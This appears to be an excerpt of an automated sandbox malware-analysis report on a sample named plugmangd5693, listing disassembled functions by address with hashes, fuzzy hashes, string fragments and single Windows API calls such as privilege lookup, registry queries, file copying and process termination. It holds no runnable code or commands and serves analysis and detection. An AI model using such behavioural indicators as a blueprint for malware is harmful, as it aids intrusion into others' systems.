Opcode Fuzzy Hash: 1c193928134161b6375c9281838e31513f17a0dbcb5686b76149129e871cc8ae
Instruction Fuzzy Hash: 5CA16570D0520EDFCB04CFE9D5814AEFBF2BF89314F24A62AD115AB248D7349A028F95

Uniqueness

Uniqueness Score: -1.00%

Function 006FEEE8, Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

:@/q, xrefs: 006FEF90

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 74e88aa095f33834b1e59e248eb21e3dc85e037324b8ef516fb58f2773029dfb
Instruction ID: 694ddc6bce119cfcfde4fa00b9baab56464722fe7899b630cf5d8c5cf50e1933
Opcode Fuzzy Hash: 74e88aa095f33834b1e59e248eb21e3dc85e037324b8ef516fb58f2773029dfb
Instruction Fuzzy Hash: E461D374D01208DFDB08DFA4D9549AEBBB6FF89310F209069D806BB764DB35AD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 006FEEF8, Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

:@/q, xrefs: 006FEF90

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 8aacc836396cb8511f630d5891a4ddef8f24971cb6f82cf8f672d3ffa63a52ea
Instruction ID: 2f98b4903a0a3af949f66644a777a64b5c8742902361b309f218c7955786e233
Opcode Fuzzy Hash: 8aacc836396cb8511f630d5891a4ddef8f24971cb6f82cf8f672d3ffa63a52ea
Instruction Fuzzy Hash: 8461B174D01208DFDB08DFA4D9549AEBBB6FF89310F209069E80AAB754DB35A942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 006F7490, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2532819a13789ae89ad1a1cb00e167cd890631b1a8c6621f8d8497b985b3ab6
Instruction ID: 3758d4e5c26681ba8dcb8ce70b8c2129e40cd36c448174b44e2745c5af6b94f2
Opcode Fuzzy Hash: a2532819a13789ae89ad1a1cb00e167cd890631b1a8c6621f8d8497b985b3ab6
Instruction Fuzzy Hash: 20C14C7090920ADFCB04CFA4C5858BEFBB2FF49310F20A55AD516AB215DB30EA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 006FDFCC, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e91a35ed108f0e98072d101cf5605f006d3dfa3ec1232fff42733a5a3327ebe
Instruction ID: a35e9613f3a5266678798d843251b1ff06b7e916b17e6a2258ea1e4ee3b64414
Opcode Fuzzy Hash: 7e91a35ed108f0e98072d101cf5605f006d3dfa3ec1232fff42733a5a3327ebe
Instruction Fuzzy Hash: E7A13474D0520CCFCB24CFA5D584AADBFB6FF89300F20A52AD516AB264DB7599028F05

Uniqueness

Uniqueness Score: -1.00%

Function 006F42D8, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909d83268f10bd8ec4a0d56791f39d0098b6f9ba23480dd1507e1e9e1f630f95
Instruction ID: fb9f8223852bbaf3bf795095e62faaa6fa7f977481ea6f7752f5582e5d378bfc
Opcode Fuzzy Hash: 909d83268f10bd8ec4a0d56791f39d0098b6f9ba23480dd1507e1e9e1f630f95
Instruction Fuzzy Hash: 56A1F371D0521DCFDB24CFA6C5806EEFBB2BF89340F24942AC515BB264EB356A468F14

Uniqueness

Uniqueness Score: -1.00%

Function 006F4698, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f0a61e0d01f3fc193337e61987e2d68f88be070235bd104213a05ffce002f0
Instruction ID: 8e44308051fda74cdda94543db49bcc1c7ed0ae4fa667e5cd30b14c6431f6bcf
Opcode Fuzzy Hash: 03f0a61e0d01f3fc193337e61987e2d68f88be070235bd104213a05ffce002f0
Instruction Fuzzy Hash: B6A14774D0520ADFCB04DFE9D5819AEFBF2BF89310F208529D525AB254DB349A02CF99

Uniqueness

Uniqueness Score: -1.00%

Function 006F3D88, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0594525b4b26b63a6497bb776964dacc5ccb15fc65cc7d7f91ae81a6d09fa674
Instruction ID: 8a17e24163c3b4b98bd4f9234deaa1e82b9b00109027c6e5df45dda669aabffc
Opcode Fuzzy Hash: 0594525b4b26b63a6497bb776964dacc5ccb15fc65cc7d7f91ae81a6d09fa674
Instruction Fuzzy Hash: 5061E074D06219DFCB44DFA9D9959ADBBF2FF89300F2080AAD805AB364DB309A01DF55

Uniqueness

Uniqueness Score: -1.00%

Function 006FB740, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22beb43968201768b8852b96fa0ab211b5ab5fc3dfd947a6acf85a95a96321be
Instruction ID: ac1d8d69aaa85c27d361411ba2448be6f9301f88813e24e362ef804ae4135e7b
Opcode Fuzzy Hash: 22beb43968201768b8852b96fa0ab211b5ab5fc3dfd947a6acf85a95a96321be
Instruction Fuzzy Hash: 3D518970D0520EDFCB04DFA5C9806FEFBB2BF99310F24A15AD625B7294C7349A019BA5

Uniqueness

Uniqueness Score: -1.00%

Function 006F5D58, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a60bfd0b53255ea46188542fe0dffe894d50b25b7afb09b80e14c641a40208a5
Instruction ID: 865b7c74b17fcb67d36321f416da040dccb6ced74f1a3f3ee7eb5a1fa8f96f3a
Opcode Fuzzy Hash: a60bfd0b53255ea46188542fe0dffe894d50b25b7afb09b80e14c641a40208a5
Instruction Fuzzy Hash: 26516C70D066098FDB08CFA6C5445BEFBF2EF89301F20D46AD616AB291D7349A41CF99

Uniqueness

Uniqueness Score: -1.00%

Function 006FE457, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a76994c921b563418ea5539990f19ea90875939aaf2dec5ef15ef839e2062f51
Instruction ID: ab372a8fff1bf4db0aae40883748741c7816e9767dde05546c4964375f1707f0
Opcode Fuzzy Hash: a76994c921b563418ea5539990f19ea90875939aaf2dec5ef15ef839e2062f51
Instruction Fuzzy Hash: 8F414870D06208DFDB44CFA5D5805EDBBF6FF8E310F20A46AD505B6264E7369942CB68

Uniqueness

Uniqueness Score: -1.00%

Function 006FE468, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc8624fb502f12cb5218f574c7facd244ad63adce0c58ddfa329e695be190b6
Instruction ID: 6c7f7cfc904260612a5130bf1dedba49e7797851182b2b62c8459671bcee523c
Opcode Fuzzy Hash: 2cc8624fb502f12cb5218f574c7facd244ad63adce0c58ddfa329e695be190b6
Instruction Fuzzy Hash: B9414670D06208DFDB44CFA5D5805EEBBF6FB8E310F20A46AD109B6264E7369901CB28

Uniqueness

Uniqueness Score: -1.00%

Function 006FD1D0, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dfe35f6325a7ccda4915074606af19f736c00331336f2cb1fda9bd218897678
Instruction ID: 9981e99647cc1a9126822935c19a090f422d7696626e404a4aecfbe04aba0426
Opcode Fuzzy Hash: 8dfe35f6325a7ccda4915074606af19f736c00331336f2cb1fda9bd218897678
Instruction Fuzzy Hash: 77514470D05209DFDB04CFA1D9A47AEBBB2FF46300F14919AE549AB290CB346A85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 006FDC20, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eceba95525b7a9d96049c44f479b6ae907ed56f5d7284db0eb62d9397246975b
Instruction ID: 3be47a7aa2dae813fcbd791adbbd4fe2cc2bed2384477fd796f11fc8d8100285
Opcode Fuzzy Hash: eceba95525b7a9d96049c44f479b6ae907ed56f5d7284db0eb62d9397246975b
Instruction Fuzzy Hash: BA310770D16209CFDB44CFA8D5815EEBBFAFB8E310F20A46AD106F7214D675A901DB68

Uniqueness

Uniqueness Score: -1.00%

Function 006FDC11, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541a1260c6c8c41207c94121b65b7011783edd71bb37ceb8663fc1c0702ccaab
Instruction ID: 27b6a115fa7a19fde6eb2f792b0fb879f3d5a9b54d823b9084e74dc11517d953
Opcode Fuzzy Hash: 541a1260c6c8c41207c94121b65b7011783edd71bb37ceb8663fc1c0702ccaab
Instruction Fuzzy Hash: 67311971D16209CFDB44DFA8D5815EEBBF6FB4E310F20A46AD106F7214D635A901CB68

Uniqueness

Uniqueness Score: -1.00%

Function 006F6692, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc270912cc6340890b8d7e60f9f9c31a29016eb7cc67251cc720f14d3a2d248a
Instruction ID: d1f2a7353ed60b2c0cff98a0b566fd81727a99aa264ca174545b0d1ef0b8bcd0
Opcode Fuzzy Hash: cc270912cc6340890b8d7e60f9f9c31a29016eb7cc67251cc720f14d3a2d248a
Instruction Fuzzy Hash: 82311571E012188FDB19CFAAC9546DEBBB7FF89300F14C0AAD409AB265DB355A45CF40

Uniqueness

Uniqueness Score: -1.00%

Function 006F37B8, Relevance: 3.9, Strings: 3, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D%Tq, xrefs: 006F3801
HVq, xrefs: 006F392F
HVq, xrefs: 006F391F

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: D%Tq$HVq$HVq
API String ID: 0-3061240123
Opcode ID: 87ac0231ca94cdb6ede98d64a0f52182c188616fc319f1c19a0d2b5aca87793b
Instruction ID: c95abbf7b2c4bffe36e7b486e7dbc6e763da0d082502245d73d97d75ad6cec75
Opcode Fuzzy Hash: 87ac0231ca94cdb6ede98d64a0f52182c188616fc319f1c19a0d2b5aca87793b
Instruction Fuzzy Hash: 4D51B4B4E01208DFCB04DFA9D594AEDBBF2BF89300F208069D819AB354DB719946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 006F5023, Relevance: 2.5, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R]4q, xrefs: 006F5028
R]4q, xrefs: 006F5069

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: R]4q$R]4q
API String ID: 0-1171621183
Opcode ID: 45783701d4e8df567363594d7d2705b03a9eb215b1b8f60493a4222a06a92a30
Instruction ID: ee640b2f518a91ff4aec93689a4f1218c8d1e71d43d65c6f4a1b067ad28ecec5
Opcode Fuzzy Hash: 45783701d4e8df567363594d7d2705b03a9eb215b1b8f60493a4222a06a92a30
Instruction Fuzzy Hash: AAF03C70E1021C8FDB94DF54C5457AEB7F2BB46300F5084A9990DB7251CB749E888F56

Uniqueness

Uniqueness Score: -1.00%

Function 002FA2AC, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32(?,00000E40,?,?), ref: 002FA341

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 47be2b6eb894ca4780a4c9a119336628493fc709113eb47da138f61e471da951
Instruction ID: dc62acc365831c30bf70d95c9ac444bdd3cac61bea391b435ccbb925bd3d5af0
Opcode Fuzzy Hash: 47be2b6eb894ca4780a4c9a119336628493fc709113eb47da138f61e471da951
Instruction Fuzzy Hash: AC31A17150E3C05FD7138B259C51B61BFB4EF47620F0941EBDC84CB6A3D229A919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01D01B39, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D01BFE

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 94468234a2ad5cd1b94e56fbfeb74be486bad8ea416f81f94f6ff62127459eb5
Instruction ID: fc46698609bd485b3974e8bf813b31d17aaa9a6597e3105a44445671fe0ca78e
Opcode Fuzzy Hash: 94468234a2ad5cd1b94e56fbfeb74be486bad8ea416f81f94f6ff62127459eb5
Instruction Fuzzy Hash: 2C41067250E3C05FD7538B758C65A92BFB4AF07210F0E84DBD984CF1A3D2699909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 002FBAEB, Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 002FBBA1

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f32e8e3959588f0938bd7dc0e953ca40a6e03f7c2abce3fbad2023b4bbb292b3
Instruction ID: 90bf21659fefe69a57ffdef3f3891a7fc4a618e7cd3af602ce21d659b88ba8f7
Opcode Fuzzy Hash: f32e8e3959588f0938bd7dc0e953ca40a6e03f7c2abce3fbad2023b4bbb292b3
Instruction Fuzzy Hash: 38318DB1505384AFE722CF65DC44F62FFE8EF06354F0884AAE9848B252D375E919CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02B8F, Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 01D02C20

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2b32f4f00b2591f4fdc818ba8c36b19fd9795a7690f8cbd6c7a00230ab6d6d15
Instruction ID: 5b5ff75383541d2af6eda73ebde7d2fa58a43c8d355fe3e43cab32ad3a00c931
Opcode Fuzzy Hash: 2b32f4f00b2591f4fdc818ba8c36b19fd9795a7690f8cbd6c7a00230ab6d6d15
Instruction Fuzzy Hash: AD31C37150A3C05FE7138B64DC55B96BFB8EF02710F0885DBE984DF193D2649909C761

Uniqueness

Uniqueness Score: -1.00%

Function 002FAB29, Relevance: 1.6, APIs: 1, Instructions: 90
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 002FABD9

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6435704cdc13fa8574fd1be2a193af9089b2f87f71818d7b63979dc0466c41ab
Instruction ID: 42813efa00bebe6f5cce93dec409588a6283a0e9240deec089ff8e52373000f7
Opcode Fuzzy Hash: 6435704cdc13fa8574fd1be2a193af9089b2f87f71818d7b63979dc0466c41ab
Instruction Fuzzy Hash: C53180B2508344AFE7228F55DC84FA6FFBCEF05350F08859BE9859B192D225A948C771

Uniqueness

Uniqueness Score: -1.00%

Function 002FAC21, Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FACDC

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7d7d3224005663e35d06376eff799d3c6565ad3dbbb7cb07b47823cef9e43145
Instruction ID: 2688c826a42eda49d4ec3cb3f92d5a09b083c089fb993aeb65286b47632b0d40
Opcode Fuzzy Hash: 7d7d3224005663e35d06376eff799d3c6565ad3dbbb7cb07b47823cef9e43145
Instruction Fuzzy Hash: E531B3711053849FE722CF65CC44FA2FFB8EF06750F0884EAE9498B193D264E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FB798, Relevance: 1.6, APIs: 1, Instructions: 89
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessTimes.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FB835

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 4c7a69b6c672b81a38c0172abbcd9cf43e59f800e04e240a6c55afa2b90afb49
Instruction ID: c3c57a4c4a2d2aff9def047ad1dccc46bdc7b4c5ac55343b139db3b44e6949a8
Opcode Fuzzy Hash: 4c7a69b6c672b81a38c0172abbcd9cf43e59f800e04e240a6c55afa2b90afb49
Instruction Fuzzy Hash: CB31E372405380AFEB12CF64DC44FA6FFB8EF46310F0885EAE9848B193D221A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FAEE0, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E40), ref: 002FAF77

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: cb3ac32903e44377410c0ba2cdec4c66e53d9321a9bff38a8591dfa3a79c240c
Instruction ID: ca87f7b1ba5035fa06412e2e8c4c09949c26e3e95ecb138fe3413d8deea6ff9a
Opcode Fuzzy Hash: cb3ac32903e44377410c0ba2cdec4c66e53d9321a9bff38a8591dfa3a79c240c
Instruction Fuzzy Hash: 1F31C1B2504344AFE721CF65DC45FA6FFE8EF05310F0885AAF948DB552D225E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D0210E, Relevance: 1.6, APIs: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileW.KERNEL32(?,?,?), ref: 01D0219A

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 16c49de91b9a9731b6ec7e1cdb037bb2d8bac5d04dff1d2f0758ae1084b32382
Instruction ID: 7209b7c6c98bb3dbf0a62c20ea840d059ce5ddb0d2670abcc99ec78ccabf8d78
Opcode Fuzzy Hash: 16c49de91b9a9731b6ec7e1cdb037bb2d8bac5d04dff1d2f0758ae1084b32382
Instruction Fuzzy Hash: F731507550E3C05FD7138B249C65752BFB89F07214F0D85DBE984CB1A3D2299849C762

Uniqueness

Uniqueness Score: -1.00%

Function 002FB12F, Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNEL32 ref: 002FB1D6

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 1d11c4de32f1fc67a6cf2b6062bc3033375dbad97e6b7fb2c0ce1ac014356c9e
Instruction ID: fb40110a30064f4d410fbef9222c677566528d70c6e2c7e9653d2a77f2a0b5c4
Opcode Fuzzy Hash: 1d11c4de32f1fc67a6cf2b6062bc3033375dbad97e6b7fb2c0ce1ac014356c9e
Instruction Fuzzy Hash: 7D31A072409384AFE722CB65DC45F96FFF8EF06314F0885DAE9848B293D365A909C761

Uniqueness

Uniqueness Score: -1.00%

Function 002FB3D9, Relevance: 1.6, APIs: 1, Instructions: 85
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(?,?), ref: 002FB479

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c4c66427069a056c5b9fc9fcf1a706dd016eac301618ca60d9a7974f983b251e
Instruction ID: feebafef443732406ed54565067dfbee6cc3f3fe8edff69df422dbd8ff9b5d41
Opcode Fuzzy Hash: c4c66427069a056c5b9fc9fcf1a706dd016eac301618ca60d9a7974f983b251e
Instruction Fuzzy Hash: CE31A2B1505384AFE712CF65CC45B66FFF8EF05310F0884AAE9888B292D365E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D0255F, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 01D025F4

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 24fa3ba34e9cab07250f543e6efdb6e5601c66977480d425ee565d8714adb1a8
Instruction ID: 894bec5de3211cc715c5061b4ac401a799ce5882833d006499cbb5373a56392c
Opcode Fuzzy Hash: 24fa3ba34e9cab07250f543e6efdb6e5601c66977480d425ee565d8714adb1a8
Instruction Fuzzy Hash: 3621A272105380AFE722CF65DC45FA7BBB8EF05310F08899AE9858B192D265E944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02034, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,?,?), ref: 01D020CE

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: InfoNamedSecurity
String ID:
API String ID: 1443090519-0
Opcode ID: 525f60b526e11f9d4433f5ab04ffdc77bc260f5772d075b63257baa94bf5ff27
Instruction ID: a20b7aef3aa690e19baa0c7e63e4497289026133e619241f3af99ba090511997
Opcode Fuzzy Hash: 525f60b526e11f9d4433f5ab04ffdc77bc260f5772d075b63257baa94bf5ff27
Instruction Fuzzy Hash: 9B317F755057409FE722CF29DC44B52BFE8EF09310F09859AE949CB292D260E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FBBF8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FBC8D

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: eb36e80b8aac2a8bdc9d9f8e7ffc915c9e6db711bbfb5adfcf2790a7fd6f903b
Instruction ID: f59b6b888075b1aa4920a0ecb94cab86ee400fc26f4edeeaa7d9c193ee7c3bc8
Opcode Fuzzy Hash: eb36e80b8aac2a8bdc9d9f8e7ffc915c9e6db711bbfb5adfcf2790a7fd6f903b
Instruction Fuzzy Hash: E82104B6408784AFE712CB15DC41BB3BFA8EF46720F0881DBE9849B193D224A909D771

Uniqueness

Uniqueness Score: -1.00%

Function 002FAD32, Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 002FADCE

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 975f75f62611a43c6aa4d3781bebaf61a3672ec7d948cb4764c3db3232b93fa6
Instruction ID: 3c66cbbf39e64954193c649c4e3cbc5148cf367b0e42ecdc4f2e01fd1965b960
Opcode Fuzzy Hash: 975f75f62611a43c6aa4d3781bebaf61a3672ec7d948cb4764c3db3232b93fa6
